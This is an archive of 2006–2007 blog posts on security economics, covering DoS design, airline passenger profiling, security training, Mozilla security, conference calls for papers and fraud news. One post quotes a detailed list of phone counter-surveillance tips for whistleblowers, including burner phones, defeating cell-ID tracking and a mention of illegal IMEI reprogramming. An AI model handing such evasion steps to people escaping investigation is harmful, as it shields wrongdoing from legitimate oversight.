    Price information activated the medial prefrontal cortex, too. This part of the brain is involved in rational calculation, and is known from previous experiments using trading games to be involved in balancing the expected and actual outcomes of monetary decisions. In this experiment its activity seemed to correlate with a volunteer's reaction to both product and price, rather than to price alone. Thus, the sense of a good bargain evoked higher activity levels in the medial prefrontal cortex, and this often preceded a decision to buy.

    OK, but that's economics and in particular behaviour during buying. What's that got to do with security? Maybe the link is that which I speculate on in the market for silver bullets; in that model, I claim that the buyer and seller knows less than needed to make a rational decision (classical 2x2 description). Then, silver bullets arise because silver bullets act as rational signals shared across the market place. (You too can speculate in the FC++ edition.)

    What I glossed over was the mechanism by which each device is selected for the hallowed status of silver bullet -- I felt that the means was less relevant than the result. However, maybe economics, psychology and brain patterns can tell us something about how this happens:

    His hypothesis is that rather than weighing the present good against future alternatives, as orthodox economics suggests happens, people actually balance the immediate pleasure of the prospective possession of a product with the immediate pain of paying for it.

    If you read the entire article, you like I might ponder if we can avoid pain and pleasure when testing innocent victims with boxes of chocolates?

    Posted by iang at 02:51 PM | Comments (1) | TrackBack

    January 06, 2007

    Now, *that's* how to do security...

    Some good articles on how to do security. Firstly, the Security Bloke at Skype talks.

    And secondly, someone in the USG reveals willingness to "know thy enemy," something generally out of favour in bureaucratic circles, and so immoral in some that it's probably illegal.

    I've written before about the necessity to understand the conundrum of the hacker as essential to our security.

    That is .. without actually endorsing the actions of our enemy, knowing him is your only way forward to victory. That's also the message at the end of this article, which while full of contradictions like "throw out your prejudices" and "trust your gut" it did have some good thoughts.

    Posted by iang at 12:30 PM | Comments (5) | TrackBack

    December 26, 2006

    Changing the Mantra -- RFC 4732 on rethinking DOS

    A couple of years ago I wrote that we should stop thinking about DOS -- denial of service attacks -- as something we don't do anything about in design phases simply because we can't stop it. The net community had adopted a sort of "institutional defeatism" which was causing problems because we weren't properly thinking through the ramifications of some of our choices.

    I proposed that for a security protocol, it should make DOS no worse than it was without the security protocol, which at least theoretically removes the temptation for the user to turn off the security. That eliminates the easy attack against the user's security. Further, we help the popularity of the security protocol, and hopefully just thinking about this objective gets the designer looking for ways to reduce DOS.

    Lynn now points to a new RFC on DOS, which primarily aims at the same thing: getting people to think about DOS when they build their systems:

    4732 I Internet Denial-of-Service Considerations, Handley M., IAB, Rescorla E., 2006/12/22 (38pp)

    This document provides an overview of possible avenues for denial-of-service (DoS) attack on Internet systems. The aim is to encourage protocol designers and network engineers towards designs that are more robust. We discuss partial solutions that reduce the effectiveness of attacks, and how some solutions might inadvertently open up alternative vulnerabilities.

    A quick skim through indicates that it includes a good list of the many classical DOS techniques, and also a useful list of defences.

    Posted by iang at 10:43 AM | Comments (1) | TrackBack

    December 09, 2006

    ATS and the death of a thousand tiny cuts

    If I was a terrorist, this would be great news. The US has revealed yet another apparently illegal and plainly dumb civilian spying programme, called ATS or Automated Targeting System. Basically, it datamines all passenger info, exactly that which they were told not to do by Congress, and flags passengers according to risk profile.

    Those who are responsible for US Homeland Insecurity had this to say:

    Jayson Ahern, an assistant commissioner of the Department of Homeland Security's Customs and Border Protection Agency, told AP: "If (the ATS programme) catches one potential terrorist, this is a success.

    From an FC perspective it is useful to see how other people's security thinking works. Let's see how their thinking stacks up. I think it goes like this:

    1. If we catch lots of terrorists we are winning the war on terror, so vote us back in.
    2. If we catch one terrorist, it's a success, so we must reinforce our efforts.
    3. If we catch no terrorists, we must try harder, so we need more data and programmes.

    See the problem? There's no feedback loop, no profit signal, no way to cull out the loss-making programmes. The only success criteria is in the minds of the people who are running the show.

    Meanwhile, let's see how a real security process works.

    1. Identify the objectives of the enemy.
    2. Figure out which of those objectives are harmful to us, and which are benign.
    3. Figure out how to make the harmful objectives loss-making to the enemy, and acceptable to us.
    4. Redirect the enemy's attention to objectives that do us no harm.
    5. Wait.

    Approximately, the objectives of the terrorists are to deliver the death of a thousand tiny cuts to the foreign occupiers, to draw from the Chinese parable. In other words, to cause costs to the US and their hapless friends, until they give up (which they must eventually do unless they have some positive reward built in to their actions).

    So let's examine the secret programme from the point of view of the terrorist. Obviously, it was no real secret to the terrorists ("yes, they will be monitoring the passenger lists for Arab names and meals....") and it is relatively easy to avoid ("we have to steal fresh identities and not order meals"). What remains is a tiny cut magnified across the entire flying public, and a minor inconvenience to the terrorist. Because it is known, it can be avoided when needed.

    We can conclude then that the ATS is directly aligned with the objectives of the terrorists. But there's worse, because it can even be used against the USA as a weapon. Consider this one again:

    "If (the ATS programme) catches one potential terrorist, this is a success."

    Obviously, one basic strategy is for the terrorists to organise their activities to avoid being caught. Or, a more advanced strategy is to amplify the effect of the US's own weapon against them. As the results of the ATS are aligned with objectives of the terrorists -- death by a thousand tiny cuts -- they can simply reinforce it. More and deeper cuts...

    Get it? As a terrorist campaign, what would be better than inserting terrorists into the passenger lists? The programme works, so catching some terrorists causes chaos and costs to the enemy (e.g., the recent shampoo debacle). The programme works, so it is a success, therefore it must be reinforced. And it works predictably, so it is easy to spoof.

    Even if the terrorist fails to get caught, he wins with some minor panic at the level of exploding shoes or shampoo bottles. And, if the suicide bomber is anything to go by, there is only a small cost to the terrorists as an organisation, and a massive cost to the enemy: consider the cost of training one suicide bomber (cheap if you want him to be caught, call it $10k) versus the cost of dealing with a terrorist that has been caught (publically funded defence, decades of appeals, free accomodation for life, private jets and bodyguards..., call it $10m per "success").

    Not to mention the megaminutes lost in the entire flying public removing their shoes. For the terrorist, ATS is the perfect storm of win-wins -- there is no lose square for him.

    On the other hand, if our security thinking was based on risk management, we'd simply use any such system for tracking known targets and later investigation of incidents. Or turn it off, to save the electricity. Far too many costs for minimal benefit.

    Luckily, in FC, we have that feedback loop. When our risk management programmes show losses, or our capital runs out, the plug is pulled. Maybe it is time to float the DHS on the LSE?

    Posted by iang at 12:33 PM | Comments (5) | TrackBack

    December 01, 2006

    CFP - Computer Security Foundations

    Twan says of WEIS: "Darn, why did I miss this workshop!? ... interesting stuff" Me too. Here's another one:

    Call For Papers

    20th IEEE Computer Security Foundations Workshop (CSF)
    Venice, Italy, July 6 - 8, 2007

    Sponsored by the Technical Committee on Security and Privacy
    of the IEEE Computer Society

    CSF20 website: http://www.dsi.unive.it/CSFW20/
    CSF home page: http://www.ieee-security.org/CSFWweb/
    CSF CFP: http://www.cs.chalmers.se/~andrei/CSF07/cfp.html

    The IEEE Computer Security Foundations Workshop (CSF) series brings together researchers in computer science to examine foundational issues in computer security. Over the past two decades, many seminal papers and techniques have been presented first at CSF. The CiteSeer Impact page lists CSF as 38th out of more than 1200 computer science venues in impact (top 3.11%) based on citation frequency. There is a possibility of upgrading CSF to an IEEE symposium already in 2007.

    New theoretical results in computer security are welcome. Also welcome are more exploratory presentations, which may examine open questions and raise fundamental concerns about existing theories. Panel proposals are welcome as well as papers. Possible topics include, but are not limited to:

       Authentication    Access control    Distributed systems
       Information flow  Trust and trust   security
       Security          management        Security for mobile
       protocols         Security models   computing
       Anonymity and     Intrusion         Executable content
       Privacy           detection         Decidability and
       Electronic voting Data and system   complexity
       Network security  integrity         Formal methods for
       Resource usage    Database security security
       control                             Language-based
                                           security
    

    Proceedings published by the IEEE Computer Society Press will be available at the workshop, and selected papers will be invited for submission to the Journal of Computer Security.

    Important Dates

    Papers due:                   Monday, February 5, 2007
    Panel proposals due:          Thursday, March 15, 2007
    Notification:                 Monday, March 26, 2007
    Camera-ready papers:          Friday, April 27, 2007
    Workshop:                     July 6-8, 2007

    Workshop Location

    The 20th IEEE Computer Security Foundations Workshop will be held in the facilities of Venice International University, located on the island of San Servolo, about 10 minutes by water ferry from the Piazza San Marco.

    More details: http://www.cs.chalmers.se/~andrei/CSF07/cfp.html

    Posted by iang at 03:40 PM | Comments (0) | TrackBack

    November 24, 2006

    Who has a Core Competency in Security?

    A debate over at Ravichar, McKeay, EC asks whether a core competency in security could make a difference. Some notes.

    Core competencies are much misunderstood. They are things that by definition almost are very strong, uncopiable, and rather rare. For example, most auto manufacturers make good engines, but Honda has a core competency in building small petrol engines with efficient profiles -- that was the opinion of Porsche, no slouch in engine design themselves.

    Most ordinary companies will do well just using security as a competency (non-core) which means they can do it for most purposes and reasonably well.

    For example, one could suggest that Apple has security as a competency; they've always been reasonable at it, and have never really drifted far from a relatively secure product. We could also suggest that Microsoft are working on a decade long project to add a security competency.

    But for some sectors, something more is needed. For a CORE competency in security we'd have to look further; the tiny word has more significance than it seems.

    I'd pick IBM in the heyday, back in the 70s and 80s. IBM was the one always chosen by the banks to do the really difficult stuff in security. They had the people to build entire new systems. E.g., before public key was fashionable, IBM built it all with secret keys, and that included the systems to deliver the secret keys! They were the ones who had the strength to create DES, in the days when nobody much could spell cryptography, let alone understand its market purpose. In the 90s, the core competency lived on as banks chose IBM to do SET (something that a lot of companies discovered to their horror...) because IBM was it in security systems.

    Who has a core competency in security these days? Nothing obvious springs to mind.

    Posted by iang at 08:56 PM | Comments (6) | TrackBack

    What is the point of encrypting information that is publicly visible?

    The Grnch asks, in all honesty:

    > What is the point of encrypting information that is publicly visible?

    To which the answer is:

    To remove the security weakness of the decision.

    This weakness is the decision required to determine what is "publicly visible" or not. Or, more generally, what is sensitive or not.

    Unfortunately, there is no algorithm to determine those two sets. Software can't make that decision, so it falls to humans. Unfortunately, humans have no good algorithm either -- they can make quick value judgements, they can make bad value judgements, or they can turn the whole thing off. Worse, even, it often falls to software engineers to make the decision (e.g., HTTPS) and not only are engineers poor at making such judgements, they don't even have local contextual information to inform them. That is, they have no clue what the user wants protected.

    The only strategy then is to encrypt everything, all the time. This feeds into my third hypothesis:

    There is only one mode, and it is secure.

    I'm being very loose here in the use of the word "secure" but suffice to say, we include encryption in the definition. But it also leads feeds into another hypothesis of mine:

    Only end-to-end security is secure.

    For the same reasons ... if we introduce a lower layer security mechanism, we again introduce a decision problem. Following on from the above, we can't trust the software to decide whether to encrypt or not, because it has no semantic wisdom with which to decide. And we can't trust the user...

    Which brings rise to the knowledge problem. Imagine a piece of software that has a binary configuration for own-security versus rely-on-lower-layers. A button that says "encrypt / no-encrypt" which you set if the lower layer has its own security or not, for example. There is, so the theory goes, no point in encrypting if the lower layer does it.

    But, how does it know? What can the software do to reliably determine whether the lower layer has encryption? Consider IPSec ... how do we know whether it is there? Consider your firewall sysadmin ... who came in on the weekend and tweaked the rules ... how do we know he didn't accidentally open something critical up? Consider online account access through a browser ... how do we know that the user has secured their operating system and browser before opening Internet Explorer or Firefox?

    You can't. We can't, I can't, nobody can rely on these things. Security models built on "just use SSL" or similar are somewhere between fatally flawed and nonsense for these reasons; for real security, security models that outsource the security to some other layer just don't cut the mustard.

    But, the infrastructure is in place, which counts for something. So are there some tweaks that we can put in place to at least make it reasonably secure, whatever that means? Yes, they include these fairly minor tweaks:

    • put the CA's name on the chrome of the browser
    • implement SNI (in everywhere but Opera :)
    • encrypt -- HTTPS -- everything all the time
    • utilise naming theory (add petnames to certs)

    Spread the word! This won't stop phishing, but it will make it harder. And, it gets us closer to doing the hard re-engineering ... such as securing against MITB.


    Appendix: Alaric Daily posts this great example:

    Posted by iang at 05:04 PM | Comments (6) | TrackBack

    November 22, 2006

    CFP: 6W on the Economics of Information Security (WEIS 2007)

    The Sixth Workshop on the Economics of Information Security (WEIS 2007)

    The Heinz School, Carnegie Mellon University Pittsburgh (PA), USA
    June 7-8, 2007

    http://weis2007.econinfosec.org/

    C A L L F O R P A P E R S

    Submissions due: March 1, 2007

    How much should we spend on security? What incentives really drive privacy decisions? What are the trade-offs that individuals, firms, and governments face when allocating resources to protect data assets? Are there good ways to distribute risks and align goals when securing information systems?

    The 2007 Workshop on the Economics of Information Security builds on the success of the previous five Workshops and invites original research papers on topics related to the economics of information security and the economics of privacy. Security and privacy threats rarely have purely technical causes. Economic, behavioral, and legal factors often contribute as much as technology to the dependability of information and information systems. Until recently, research in security and dependability focused almost exclusively on technical factors, rather than incentives. The application of economic analysis to these problems has now become an exciting and fruitful area of research.

    We encourage economists, computer scientists, business school researchers, law scholars, security and privacy specialists, as well as industry experts to submit their research and attend the Workshop. Suggested topics include (but are not limited to) empirical and theoretical economic studies of:


    - Optimal security investment
    - Software and system dependability
    - Privacy, confidentiality, and anonymity
    - Vulnerabilities, patching, and disclosure
    - DRM and trusted computing
    - Trust and reputation systems
    - Security models and metrics
    - Behavioral security and privacy
    - Information systems liability and insurance
    - Information threat modeling and risk management
    - Phishing and spam


    **Important dates**

    - Submissions due: March 1, 2007
    - Notification of acceptance: April 10, 2007
    - Workshop: June 7-8, 2007

    For more information visit http://weis2007.econinfosec.org/.

    Posted by iang at 09:56 AM | Comments (0) | TrackBack

    October 23, 2006

    Tracking Threats - how whistleblowers can avoid tracking by cell/mobile

    Someone's paying attention to the tracking ability of mobile phones. Darrent points to Spyblog who suggests some tips to whistleblowers (those who sacrifice their careers and sometimes their liberty to reveal crimes in government and other places):

    8. Do not use your normal mobile phone to contact a journalist or blogger from your Home Office location, or from home. The Cell ID of your mobile phone will pinpoint your location in Marsham Street and the time and date of your call. This works identically for Short Message Service text messages as well as for Voice calls.

    Such Communications Traffic Data does not require that a warrant be signed by the Home Secretary, a much more junior official has the power to do this, e.g. the Home Office Departmental Security Unit headed by Jacqueline Sharland.

    9. Buy a cheap pre-paid mobile phone from a supermarket etc..

    • Do not buy the phone or top up phone credit using a Credit Card or a make use of a Supermarket Loyalty Card.
    • Do not switch on or activate the new mobile at home or at work, or when your normal mobile phone switched on (the first activation of a mobile phone has its physical location logged, and it is easy to see what other phones are active in the surrounding Cells at the same time.
    • Do not Register your pre-paid mobile phone, despite the tempting offers of "free" phone credit.
    • Do not store any friends or familiy or other business phone numbers on this disposable phone - only press or broadcast media or blogger contacts.
    • Set a power on PIN and a Security PIN code on the phone.
    • Physically destroy the phone and the SIM card once you have done your whistleblowing. Remember that your DNA and fingerprints will be on this mobile phone handset.
    • Do not be tempted to re-use the SIM in another phone or to put a fresh SIM in the old phone, unless you are confident about your ability to illegally re-program the International Mobile Equipment Electronic Identity (IMEI).

    Just in case you think this is excessive paranoia, it recently emerged that journalists in the USA and in Germany were having their phones monitored, by their national intelligence agencies, precisely to try to track down their "anonymous sources".

    Why would this not happen here in the UK ?

    See Computer Encryption and Mobile Phone evidence and the alleged justification for 90 days Detention Without Charge - Home Affairs Select Committee Oral Evidence 14th February 2006

    ...

    25. If you decide to meet with an alleged "journalist" or blogger (who may not always be who they claim to be), or if a journalist or blogger decides to meet with an "anonymous source" (who also might not be who they claim to be), then you should switch off your mobile phones, since the proximity of two mobile phones in the same approximate area, at the same time, is something which can be data mined from the Call Data Records, even if no phone conversations have taken place. Typically a mobile phone will handshake with the strongest Cell Base Station transmitter every 6 to 10 minutes, and this all gets logged, all of the time.

    Read the whole thing if it is important to you. Personally, I'd say that's a difficult list. If you are suspect, don't use a cellphone. Not that I have a better idea (although I think Spyblog's comments on Skype are perhaps a little weak.)

    Posted by iang at 08:30 AM | Comments (2) | TrackBack

    October 06, 2006

    Why security training is really important (and it ain't anything to do with security!)

    Lynn mentioned in comments yesterday:

    I guess I have to admit to being on a roll.

    :-) Lynn grasped the nexus between the tea-room and the systems room yesterday:

    One of the big issues is inadequate design and/or assumptions ... in part, failing to assume that the operating environment is an extremely hostile environment with an enormous number of bad things that can happen.

    What I didn't stress was the reasons behind why security training was so important -- more important than your average CSO knows about. Lynn spots it above: reliability.

    The reason we benefit from teaching security (think Fight Club here not the American Football) is that it clearly teaches how to build reliable systems. The problem addressed here is that unreliable systems fall foul of statistical enemies, and they are weak, few and far between. But when you get to big systems and lots of transactions, they become significant, and systems without reliability die the death of a thousand cuts.

    Security training solves this because it takes the statistical enemy up several notches and makes it apparent and dangerous even in small environments. And, once a mind is tuned to thinking of the attack of the aggressor, dealing with the statistical failure is easy, it's just an accidental case of what an aggressor could do.

    I would even assert that the enormous amounts of money spent attempting to patch an inadequate implementation can be orders of magnitude larger than the cost of doing it right in the first place.

    This is the conventional wisdom of the security industry -- and I disagree. Not because it doesn't make sense, and because it isn't true (it makes sense! and it's true!) but because time and time again, we've tried it and it has failed.

    The security industry is full of examples where we've spent huge amounts of money on up-front "adequate security," and it's been wasted. It is not full of examples where we've spent huge amounts of money up front, and it's paid off...

    Partly, the conventional security industry wisdom fails because it is far too easy for us to hang it all out in the tea-room and make like we actually know what we are talking about in security. It's simply too easy to blather such received wisdom. In the market for silver bullets, we simply don't know, and we share that absence of knowledge with phrases and images that lose meaning for their repitition. In such a market, we end up selling the wrong product for a big price -- payment up front, please!

    We are better off -- I assert -- saving our money until the wrong product shows itself to be wrong. Sell the wrong product by all means, but sell it cheaply. Live life a little dangerously, and let a few frauds happen. Ride the GP curve up and learn from your attackers.

    But of course, we don't really disagree, as Lynn immediately goes on to say:

    Some of this is security proportional to risk ... where it is also fundamental that what may be at risk is correctly identified.

    Right.

    To close with reference to yesterday's post: Security talk also easily impresses the managerial class, and this is another reason why we need "hackers" to "hack", to use today's unfortunate lingo. A breach of security, rendered before our very servers, speaks for itself, in terms that cut through the sales talk of the silver bullet sellers. A breach of security is a hard fact that can be fed into the above risk analysis, in a world where Spencarian signals abound.

    Posted by iang at 02:35 PM | Comments (4) | TrackBack

    October 05, 2006

    How the Classical Scholars dropped security from the canon of Computer Science

    Once upon a time we all went to CompSci school and had lots of fun.

    Then it all stopped. It stopped at different times at different places, of course, but it was always for the same reason. "You can't have fun," wiggled the finger of some professor talking a lot of Greek.

    Well, it wasn't quite like that, but there is a germ of truth in the story. Have a look over at this post (spotted on EC) where the poster declares -- after a long-winded description of the benefits of a classical education -- that the computer science schools should add security to their canons, or core curricula. (Did I get the plurals right? If you know the answer you will have trouble following the rest of this post...)

    Teaching someone to validate input is easy. Teaching someone why they need to be rabid about doing it every single time - so that they internalize the importance of security - is hard. It's the ethics and values part of secure coding I really hate having to retrofit, not the technical bit. As it says in Proverbs 22:6, "Train a child in the way he should go, and when he is old he will not turn from it."

    This poster has it wrong, and I sense years in the classroom, under the ruler, doing verbs, adverbs and whatnots. No fun at all.

    Of course, the reason security is hard is because they -- the un-fun classical scholars -- don't provide any particular view as to why it is necessary, and modern programmers might not be able to eloquently fill in the gap, but they do make very economic decisions. Economics trumps ethics in all known competitions, so talking about "ethics and values of secure coding" is just more Greek.

    So what happened to the fun of it all? I speak of those age-old core skills now gone, the skills now bemoaned in the board rooms of just-hacked corporations the world around, as they frown over their SB1386s. To find out happened to them, we have to go back a long time, to a time where titles mattered.

    Time was, a junior programmer didn't have a title, and his first skills were listening, coding and frothing.

    He listened, he coded and frothed, all under close supervision, and perchance entered the world's notice as a journeyman, being an unsupervised listener, coder and frother.

    In those days, the journeyman was called a hacker, because he was capable of hacking some bits and pieces together, of literally making a hack of something. It was a bit of a joke, really, but our hacker could get the job done, and it was better to be known as one than not being known at all. (One day he would aspire to become a guru or a wizard, but that's another story.)

    There was another lesser meaning to hacker, which derived from one of the journeyman's core classes in the canon -- breaching security. He was required to attack others' work. Not so as to break it but so as to understand it. To learn, and to appreciate why certain odd things were done in very certain but very odd ways.

    Breaching security was not only fun, it was a normal and necessary part of computer science. If you haven't done it, you aren't well rounded, and this is partly why I muck around in such non-PC areas such as poking holes in SSL. If I can poke holes in SSL, so the theory of secure protocols goes, then I'm ready -- perhaps -- to design my own.

    Indeed breaching security or its analogue is normal and essential in many disciplines; cryptology for example teaches that you should spend a decade or so attacking others' designs -- cryptanalysis -- before you ever should dare to make your own -- cryptography. Can you imagine doing a civil engineering course without bending some beams?

    (Back to the story.) And in due course, when a security system was breached, it became known as being hacked. Not because the verb was so intended, but by process of elimination some hacker had done it, pursuant to his studies. (Gurus did not need to practice, only discuss over cappuccinos. Juniors listened and didn't do anything unless told, mostly cleaning out the Atomic for another brew.)

    You can see where we are going now, so I'll hit fast-forward. More time passed ... more learning a.k.a. hacking ... The press grasped the sexy term and reversed the senses of the meaning.

    Some company had its security breached. Hacking became annoying. The fun diminishes... Then the viruses, then the trojans, the DDOS, the phishing, the ....

    And it all got lumped together under one bad name and made bad. Rustication for some, "Resigned" for others, Jail for some unfortunates.

    That's how computer science lost the security skills from the canon. It was dropped from the University curricula by people who didn't understand that it was there for a reason. Bureaucrats, lawmakers, police, and especially corporates who didn't want to do security and preferred to blame others, etc etc, the list of naysayers is very long.

    Having stripped it from computer science, we are now in a world where security is not taught, and need to ask: what they suggest in its place:

    There are some bright security spots in the academic environs. For example, one professor I talked to at Stanford in the CS department - in a non-security class, no less - had his students "red team" and blue team" their homework, to stress that any and all homework had to be unhackable. Go, Stanford! Part of your grade was your homework, but your grade was reduced if a classmate could hack it. As it should be.

    Right, pretend hacking exercises. Also, security conferences. Nice in spirit, but the implementation is a rather poor copy of the original. Indeed, if you think about the dynamics of hacking games and security conferences ("Nobody ever got hacked going to Blue Hat??") we aren't likely to sigh with relief.

    And then:

    One of my colleagues in industry has an even more draconian (but necessary) suggestion for enforcing change upon universities. ... He decided that one way to get people's attention was to ask Congress to tie research funds to universities to changing the computer science curriculum. I dare say if universities' research grants were held up, they might find the extra time or muster the will to change their curricula!

    Heaven help us! Are we to believe that the solution to the security training quandary is to ask the government to tell us how to do security training? Tell me this is a joke, and the Hello Kitty People haven't taken over our future:

    The Hello Kitty people are those teenagers who put their personal lives on MySpace and then complain that their privacy is being violated. They are the TV viewers who think that the Hurricane Katrina rescue or the Iraq war were screwed up only because we don't, they belatedly discover, have actual Hello Kitties in political power. When inevitably some of world's Kitties, unknown beyond their cute image, turn out to be less than fully trustworthy, the chorus of yowling Kitty People becomes unbearable cacophony.

    (We've written before about how perhaps the greatest direct enemy of Internet security is the government, so we won't repeat today.)

    Here is a test. A corporation such as Oracle could do this, instead of blaming the government or the hackers or other corporations for its security woes. Or Microsoft could do it, or anyone, really.

    Simply instruct all your people to breach security. Fill in the missing element in the canon. Breach something, today, and learn.

    Obviously, the Greeks will complain about the errant irresponsibility of such support for crime ... but just as obviously, if they were to do that, their security knowledge would go up by leaps and bounds.

    Sadly, if this were taken seriously, modern corporations such as Oracle would collapse in a heap. It's far cheaper to drop the training, blame "the hackers" and ask the government for a subsidy.

    Even more sadly, we just don't have a better version of training than "weapons free." But let's at least realise that this is the issue: you classicals, you bureaucrats, you Sonys and Oracles and Suns, you scared insecure corporations have brought us to where we are now, so don't blame the Universities, blame yourselves.

    And, in the name of all that is sacred, *don't ask the government for help!*

    Posted by iang at 06:58 PM | Comments (6) | TrackBack

    October 03, 2006

    The Last Link of Security

    Vlad Miller writes from Russia (translated by Daniel Nagy):

    We can invent any algorithm, develop any protocol, build any system, but, no matter how secure and reliable they are, it is the human taking the final decision that remains the last link of security. And, taking into account the pecularities of human nature, the least reliable link, at that, limiting the security of the entire system. All of this has long been an axiom, but I would like to share a curious case, which serves as yet another confirmation of this fact.

    We all visit banks. Banks, in addition to being financial organizations attracting and investing their clients' funds, are complex systems of informational, physical and economic defenses for the deposited cash and account money. Economic defenses are based on procedures of confirming and controlling transactions, informational defenses -- on measures and procedures guarding the information about transactions, personal, financial and other data, while physical defenses comprise the building and maintenance of a secure physical perimeter around the guarded objects: buildings, rooms and valuable items.

    Yet, regardless of the well-coordinated nature of the whole process, final decisions are always taken by humans: the guard decides whether or not to let the employee that forgot his ID through the checkpoint; the teller decides whether a person is indeed the owner of the passport and the account he claims to own; the cashier decides whether or not there is anything suspicious in the presented order. A failure can occur at any point, and not only as a consequence of fraudulent activities, but also due to carelessness or lack of attention on the part of the bank's employee, a link of the security system.

    Not too long ago, I was in my bank to deposit some cash on my account. The teller checked my passport, compared my looks to the photo within, took my book and signed a deposit order for the given amount. The same data were duplicated in the bank's information system and the order with my book were passed on to the cashier. Meanwhile, I was given a token with the transaction number, which I should have presented to the cashier so that she could process the corresponding order. Everybody is familiar with this procedure; it may differ a bit from bank to bank, but the general principles are the same.

    Walking over to the cashier, I have executed my part of the protocol by handing over the token to the cahsier (but I did not put the cash into the drawer before having been asked to do so). She looked at my order, affixed her signature to it and to my book and ... took a few decks of banknotes out of the safe and started feeding them to the counting machine. I got curious how long it would take for the young lady to realize the error in her actions, and did not interrupt her noble thrust. And only when she turned around to put the cash into the drawer did I delicately remark that I did not expect such a present for March 8 and that I came to deposit some cash, not to withdraw. For a few seconds, the yound lady gave me a confused look, then, after looking at the order and crossing herself, thanked me for saving her from being fired.

    The banking system relies a great deal on governmental mechanisms of prevention, control and reaction. Had I not, in computer-speak, interrupted the execution of the miscarried protocol, but instead left the bank with the doubled amount of money, it would not have lead to anything except for the confiscation of the amount of my "unfounded enrichment". The last link of security is unreliable: it fails at random and is strongly vulnerable to various interferences and influences. This is why control and reaction are no less important than prevention of attacks and failures.

    Posted by iang at 11:36 AM | Comments (0) | TrackBack

    September 27, 2006

    Mozilla moves on security

    There are already a couple of improvements signalled at Mozilla in security terms since the appointment of Window Snyder as single security chair, for those interested (and as Firefox has 10-20% of the browser market, it is somewhat important). Check out this interview.

    1. Understanding of what the word 'security' means:
      What is the key rule that you live by in terms of security?
      Snyder: That nothing is secure. ...

      ( Adi Shamir says that absolutely secure systems don't exists. Lynn's version: "can you say security proportional to risk?" I say Pareto-secure ... Of course, to risk practitioners, this is just journeyman stuff. )


    2. Avoidance of battle on the plain of "most secure browser":

      So the answer, in one word: Is Firefox more secure than Internet Explorer?
      Snyder: I don't think there is a one-word answer for that question.

      If ever there was a battle that was unwinnable, that was it. It quite possibly needed someone who had extensive and internal experience of MS to nail that one for Mozo.


    3. Here's the one I was curious about:

      You dealt with security researchers at Microsoft and will deal with them at Mozilla. How do you see the community? There have been several cases where researchers have gone public with Firefox flaws.
      Snyder: The security research community I see as another part of the Mozilla community. There's an opportunity for these people, if they get excited about the Mozilla project, to really contribute. They can contribute to secure design, they can suggest features, they can help us identify vulnerabilities, and they can help us test it. They can help us build tools to find more vulnerabilities. The spectrum is much broader (than with commercial products) in ways the research community can contribute to this project.

      Earlier, Snyder said:

      Snyder: There has been a lot of great work done. I think there is a great opportunity to continue that work and make the entire process available externally.

      Is this a move towards opening Mozilla's closed security process? If so, that would be most welcome.

    And in other news, Firefox 2.0 is almost here:

    Version 2.0 of the software will still feature a raft of new features including an integrated in-line spell checker, as well as an anti-phishing tool (a must-have accessory that's in Opera 9 and will be included in IE 7),...

    Hopefully someone will get a chance to review it the anti-phishing tool (!) and compare it to the efforts of the research community over the last few years.

    Posted by iang at 03:36 PM | Comments (4) | TrackBack

    September 07, 2006

    Mozilla now has a "Chief Security Something"

    One of the big problems with Mozilla was that they didn't have a Security Czar. This lack meant that far-reaching threats such as phishing failed to be addressed because the scope was too broad for the existing specialists, and as Firefox now takes the teens in browser market share, that's a big issue.

    Now they do! Excellent news, reported over on "schrep's blog":

    Window has joined MozCorp recently as our new "Chief Security Something" (that's a working title :-)). She'll be the public voice of Mozilla Corporation on security issues and helping to drive our long-term security strategy.

    Congrats! Also, article at eWeek

    Spotted by Adam.

    Posted by iang at 06:53 AM | Comments (0) | TrackBack

    August 24, 2006

    Fraudwatch - how much a Brit costs, how to be a 419-er, Sarbanes-Oxley rises as fraud rises, the real Piracy

    A BBC programme reported the cost of Brit identities as extracted from recycled PCs:

    Bank account details belonging to thousands of Britons are being sold in West Africa for less than £20 each, the BBC's Real Story programme has found.

    Which comes as the EU moves to total passenger tracking:

    BIOMETRIC testing is set to be introduced at European airports under plans for stringent new security measures revealed yesterday in the wake of last week's alleged terror plot. Passengers would have their fingerprint or iris scanned under the measures proposed by EU interior ministers, which would also use passenger profiling to try to identify potential terrorists.

    Here's some stats on Nigerian 419 scams, another deception with higher risks for the consumer but not the retailer:

    He sent 500 e-mails a day and usually received about seven replies. Shepherd would then take over. "When you get a reply, it's 70% sure that you'll get the money," Samuel said. ... By 2003, Shepherd was fleecing 25 to 40 victims a month, Samuel said. Samuel never got the 20%, but still made a minimum of $900 a month, three times the average income here. At times, he made $6,000 to $7,000 a month.

    Samuel said Shepherd employs seven Nigerians in America, including one in the San Francisco Bay Area, to spy on maghas and threaten any who get cold feet. If a big deal is going off track, he calls in all seven.

    "They're all graduates and very smart," Samuel said. "Four of them are graduates in psychology here in Nigeria. If the white guy is getting suspicious, he'll call them all in and say, 'Can you finish this off for me?'

    "They'll try to scare you that you're not going to get out of it. Or you're going to be arrested and you will face trial in Nigeria. They'll say: 'We know you were at Wal-Mart yesterday. We know the D.A. He's our friend.' "

    "They'll tell you that you are in too deep - you either complete it or you'll be killed."

    Anyone want to hazard when crooks will be able to buy European biometric data in Africa? More from the BBC.

    Once in a blue moon, using dodgy identity cards seems not to work (dead link):

    A Toronto man who wanted a fraudulent driver's licence added to his collection of counterfeit ID was foiled by a sharp-eyed employee with the Ministry of Transportation in Hamilton. .... The convicted man provided a Canadian citizenship card in the name of Rohan Omar Kelly when he showed up with a friend on June 12 to write a driver's exam at the ministry's Kenilworth Avenue office.

    The employee took a long, hard look at his identification and discreetly slipped away to call the police.

    Meanwhile, his friend presented a credit card to pay for the fictitious Kelly's fee. The card, as it would turn out when the pair was arrested a short time later, was a pirated copy. The same was true for a Canadian social insurance card seized from Thomas and a second citizenship card that police found on the dash of the friend's Chev Malibu parked outside.

    I wouldn't suggest you do that at home, folks! Fraud responds well to natural selection; the dumb crooks get caught, leaving the smart ones. Actually, the smart ones get caught too, but not before training two more up.

    Laws on fraud enjoy no such control, they just get bigger and dumber. CompliancePipeline reports on the anti-climax of Sarbanes-Oxley:

    The top-level findings show that even in the more heavily regulated business environment, the incidence of fraud continues to increase. Sixty-seven percent of the respondents indicated that institutional fraud is more prevalent today than five years ago, and another 27 percent said there has been no change level of fraud activity.

    Probably, Sarbanes-Oxley supporters will say that they just need to try harder, write more rules, bust more companies, etc etc. Perhaps they should create identity trails as part of their data? New figures suggest identity theft is becoming more valuable, but that's no reason not to store massive amounts of identity information:

